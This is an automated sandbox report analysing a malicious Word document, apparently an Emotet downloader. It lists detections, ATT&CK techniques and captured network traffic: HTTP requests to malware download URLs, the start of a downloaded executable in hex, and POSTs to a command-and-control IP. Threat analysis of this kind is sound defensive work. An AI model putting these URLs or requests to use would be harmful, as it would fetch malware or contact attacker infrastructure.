Analysis Report S_974960546330.doc

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:188700
Start date:09.11.2019
Start time:00:13:21
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 17m 23s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:S_974960546330.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Potential for more IOCs and behavior
Number of analysed new started processes analysed:28
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.expl.evad.winDOC@19/47@4/4
EGA Information:
  • Successful, ratio: 62.5%
HDC Information:
  • Successful, ratio: 38.7% (good quality ratio 30.8%)
  • Quality average: 65.9%
  • Quality standard deviation: 38.1%
HCA Information:
  • Successful, ratio: 68%
  • Number of executed functions: 149
  • Number of non-executed functions: 288
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, TiWorker.exe, wermgr.exe, MusNotifyIcon.exe, conhost.exe, CompatTelRunner.exe, Integrator.exe
  • Excluded IPs from analysis (whitelisted): 13.107.3.128, 13.107.5.88, 52.109.88.8, 52.109.124.19, 52.114.158.91, 2.16.216.50, 2.16.216.40, 52.109.8.20, 8.248.129.254, 8.248.115.254, 67.26.83.254, 67.27.234.126, 8.248.131.254, 205.185.216.42, 205.185.216.10, 40.90.137.120, 40.90.23.247, 40.90.137.127, 93.184.220.29, 20.44.86.43, 51.143.111.7, 52.158.208.111
  • Excluded domains from analysis (whitelisted): umwatson.trafficmanager.net, fg.download.windowsupdate.com.c.footprint.net, client-office365-tas.msedge.net, cs9.wac.phicdn.net, 2-01-3cf7-0009.cdx.cedexis.net, mobile.pipe.aria.microsoft.com, e-0009.e-msedge.net, a767.dspw65.akamai.net, vs.login.msa.akadns6.net, prd.col.aria.mobile.skypedata.akadns.net, ocsp.digicert.com, login.live.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, watson.telemetry.microsoft.com, config.edge.skype.com, pipe.cloudapp.aria.akadns.net, afdo-tas-offload.trafficmanager.net, prod.configsvc1.live.com.akadns.net, s-0001.s-msedge.net, download.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, pipe.skype.com, config.officeapps.live.com, login.msa.akadns6.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net
  • Execution Graph export aborted for target WINWORD.EXE, PID 384 because there are no executed function
  • Execution Graph export aborted for target powershell.exe, PID 1732 because it is empty
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy:Threshold
Score:100
Range:0 - 100
Whitelisted:false
Threat:Emotet
Detection:malicious

Confidence

Strategy:Threshold
Score:5
Range:0 - 5
Further Analysis Required?:false


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts 1 | Windows Management Instrumentation 1 | Valid Accounts 1 | Valid Accounts 1 | Software Packing 1 | Input Capture 1 | System Time Discovery 1 | Remote File Copy 12 | Input Capture 1 | Data Encrypted 12 | Commonly Used Port 1
Replication Through Removable Media 1 | PowerShell 2 | Modify Existing Service 11 | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 11 | Network Sniffing | Peripheral Device Discovery 11 | Replication Through Removable Media 1 | Data from Removable Media | Exfiltration Over Other Network Medium | Remote File Copy 12
Drive-by Compromise | Scripting 2 | New Service 12 | New Service 12 | Scripting 2 | Input Capture | Security Software Discovery 51 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Cryptographic Protocol 22
Exploit Public-Facing Application | Execution through API 1 | System Firmware | DLL Search Order Hijacking | File Deletion 1 | Credentials in Files | System Service Discovery 1 | Logon Scripts | Input Capture | Data Encrypted | Standard Non-Application Layer Protocol 4
Spearphishing Link | Exploitation for Client Execution 3 | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information 31 | Account Manipulation | File and Directory Discovery 2 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Application Layer Protocol 24
Spearphishing Attachment | Command-Line Interface 11 | Modify Existing Service | New Service | Masquerading 21 | Brute Force | System Information Discovery 45 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port
Spearphishing via Service | Service Execution 2 | Path Interception | Scheduled Task | Valid Accounts 1 | Two-Factor Authentication Interception | Query Registry 1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port
Supply Chain Compromise | Third-party Software | Logon Scripts | Process Injection | Access Token Manipulation 1 | Bash History | Process Discovery 2 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol
Trusted Relationship | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | DLL Side-Loading 1 | Input Prompt | Application Window Discovery 1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption
Hardware Additions | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Scripting | Keychain | Remote System Discovery 1 | Taint Shared Content | Audio Capture | | Connection Proxy

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: http://www.eximalert.com/dhxq/XweuZD/ Avira URL Cloud: Label: malware
Antivirus or Machine Learning detection for dropped file
Source: C:\Users\user\20.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for sample
Source: S_974960546330.doc Avira: detection malicious, Label: VBA/Dldr.Agent.hpdyc
Source: S_974960546330.doc Joe Sandbox ML: detected
Multi AV Scanner detection for domain / URL
Source: eximalert.com Virustotal: Detection: 7%
Source: axocom.fr Virustotal: Detection: 7%
Source: www.eximalert.com Virustotal: Detection: 7%
Source: http://www.eximalert.com/dhxq/XweuZD/ Virustotal: Detection: 18%
Source: https://orchaskiddiesworld.com/t24dfh/ea/ Virustotal: Detection: 16%
Source: https://axocom.fr/wp-admin/maint/d01/ Virustotal: Detection: 14%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\20.exe Virustotal: Detection: 17%
Multi AV Scanner detection for submitted file
Source: S_974960546330.doc Virustotal: Detection: 59%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\20.exe Code function: 8_2_00FA207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,8_2_00FA207B
Source: C:\Users\user\20.exe Code function: 8_2_00FA215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,8_2_00FA215A
Source: C:\Users\user\20.exe Code function: 8_2_00FA1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,8_2_00FA1FFC
Source: C:\Users\user\20.exe Code function: 8_2_00FA1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,8_2_00FA1F75
Source: C:\Users\user\20.exe Code function: 8_2_00FA1F56 CryptGetHashParam,8_2_00FA1F56
Source: C:\Users\user\20.exe Code function: 8_2_00FA1F11 CryptExportKey,8_2_00FA1F11
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 10_2_001E1F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,10_2_001E1F75
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 10_2_001E1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,10_2_001E1FFC
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 10_2_001E207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,10_2_001E207B
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 10_2_001E215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,10_2_001E215A
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 10_2_001E1F11 CryptExportKey,10_2_001E1F11
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 10_2_001E1F56 CryptGetHashParam,10_2_001E1F56

Spreading:

Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\Users\user\20.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\20.exe Code function: 7_2_00415B40 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,7_2_00415B40
Source: C:\Users\user\20.exe Code function: 8_2_00415B40 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,8_2_00415B40
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 9_2_00415B40 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,9_2_00415B40
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 10_2_00415B40 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,10_2_00415B40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 27_2_6EA02957 FindFirstFileExA,27_2_6EA02957
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 27_2_6E99B125 FindFirstFileExW,FindClose,27_2_6E99B125

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\20.exe Code function: 4x nop then sub esp, 1Ch 7_2_00416890
Source: C:\Users\user\20.exe Code function: 4x nop then sub esp, 1Ch 8_2_00416890
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 4x nop then sub esp, 1Ch 9_2_00416890
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 4x nop then sub esp, 1Ch 10_2_00416890
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: axocom.fr
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.5:49720 -> 116.203.228.95:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.5:49720 -> 116.203.228.95:443

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Cache-Control: no-cache, must-revalidate
  Pragma: no-cache
  Content-Type: application/x-dosexec
  Expires: Fri, 08 Nov 2019 23:15:20 GMT
  Last-Modified: Fri, 08 Nov 2019 23:15:20 GMT
  Server: Microsoft-IIS/10.0
  Set-Cookie: 5dc5f70840a50=1573254920; expires=Fri, 08-Nov-2019 23:16:20 GMT; Max-Age=60; path=/
  Content-Disposition: attachment; filename="aGgc7oFyNpM7rNCLGQ.exe"
  Content-Transfer-Encoding: binary
  X-Powered-By: ASP.NET
  X-Powered-By-Plesk: PleskWin
  Date: Fri, 08 Nov 2019 23:15:20 GMT
  Content-Length: 201300
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 ac d9 c5 5d 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 1c 00 76
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
  GET /dhxq/XweuZD/ HTTP/1.1
  Host: www.eximalert.com
  Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  POST /vermont/forced/pdf/merge/ HTTP/1.1
  Referer: http://74.208.125.192/vermont/forced/pdf/merge/
  Content-Type: application/x-www-form-urlencoded
  DNT: 1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 74.208.125.192:443
  Content-Length: 632
  Connection: Keep-Alive
  Cache-Control: no-cache
Connects to IPs without corresponding DNS lookups
Source: unknown TCP traffic detected without corresponding DNS query: 74.208.125.192
Contains functionality to download additional files from the internet
Source: C:\Windows\SysWOW64\sspiresize.exe Code function: 10_2_001E1383 InternetReadFile,10_2_001E1383
Downloads files from webservers via HTTP
Source: global traffic HTTP traffic detected:
  GET /dhxq/XweuZD/ HTTP/1.1
  Host: www.eximalert.com
  Connection: Keep-Alive
Found strings which match to known social media urls
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.1946108966.000001BA1FE6B000.00000004.00000001.sdmp String found in binary or memory: .hotmail.com1&0 equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmp String found in binary or memory: <html class="no-js" lang="fr-FR" xmlns="http://www.w3.org/1999/xhtml" prefix="og: http://ogp.me/ns# fb: http://www.facebook.com/2008/fbml" > equals www.facebook.com (Facebook)
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmp String found in binary or memory: LinkedIn equals www.linkedin.com (Linkedin)
Source: powershell.exe, 00000005.00000002.1948413882.000001BA05E50000.00000004.00000020.sdmp String found in binary or memory: Microsoft.AspNet.Mvc.Facebook equals www.facebook.com (Facebook)
Source: WINWORD.EXE, 00000000.00000002.2864736894.000000000059C000.00000004.00000020.sdmp String found in binary or memory: api/v1/linkedin/associations2 equals www.linkedin.com (Linkedin)
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.1946108966.000001BA1FE6B000.00000004.00000001.sdmp String found in binary or memory: hotmail.co.uk1 equals www.hotmail.com (Hotmail)
Source: WINWORD.EXE, 00000000.00000003.2198802299.000000000C79D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.1946108966.000001BA1FE6B000.00000004.00000001.sdmp String found in binary or memory: hotmail.com1 equals www.hotmail.com (Hotmail)
Performs DNS lookups
Source: unknown DNS traffic detected: queries for: axocom.fr
Posts data to webserver
Source: unknown HTTP traffic detected:
  POST /vermont/forced/pdf/merge/ HTTP/1.1
  Referer: http://74.208.125.192/vermont/forced/pdf/merge/
  Content-Type: application/x-www-form-urlencoded
  DNT: 1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 74.208.125.192:443
  Content-Length: 632
  Connection: Keep-Alive
  Cache-Control: no-cache
Urls found in memory or binary data
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/
Source: WINWORD.EXE, 00000000.00000002.2864736894.000000000059C000.00000004.00000020.sdmpString found in binary or memory: https://apis.live.net/v5.0/b
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/ne
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selection5
Source: WINWORD.EXE, WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: WINWORD.EXE, 00000000.00000002.2872627095.000000000C660000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/42
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com
Source: WINWORD.EXE, 00000000.00000003.1764063553.000000000C903000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
Source: WINWORD.EXE, 00000000.00000003.2194824784.000000000C7D2000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comZ
Source: WINWORD.EXE, 00000000.00000003.1763058687.000000000C7D3000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: WINWORD.EXE, 00000000.00000003.1764097322.000000000C92A000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlocTilin
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.1936056094.000001BA0A5BE000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=E4G
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=Oreillette
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=a7
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=adaptateur
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=allume
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=armband
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=cable
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=casque
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=ecouteur
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=film
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=j3
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=kingston
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=nokia
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=ordinateur
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=power
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=redmi
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=selfie
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=sony
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=support
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=xiaomi
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/?product_cat=&amp;post_type=product&amp;s=xperia
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/6c-pro/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a10-2019/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a20-a30/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a20e/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a3-2017/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a40/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a5-2017/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a6-plus-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a70/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a8-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a80/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/a9-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/apple
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ascend-p8-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ascend-p8/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ascend-p9-lite/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/ascend-p9/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/bonne-affaire/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/coreprime/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/enceinte/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/gadgets/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-a3-2016/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-a5-2016/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-a50/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-a6-2018/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-a8/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-ace-4/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-grand-neo/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-j1-2016/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-j1/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-j2/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-j3-2016/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-j5-2016/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-j5/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-j7-2016/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-j7/
Source: powershell.exe, 00000005.00000003.1937162737.000001BA0A922000.00000004.00000001.sdmpString found in binary or memory: https://axocom.fr/categorie-produit/galaxy-note-5/
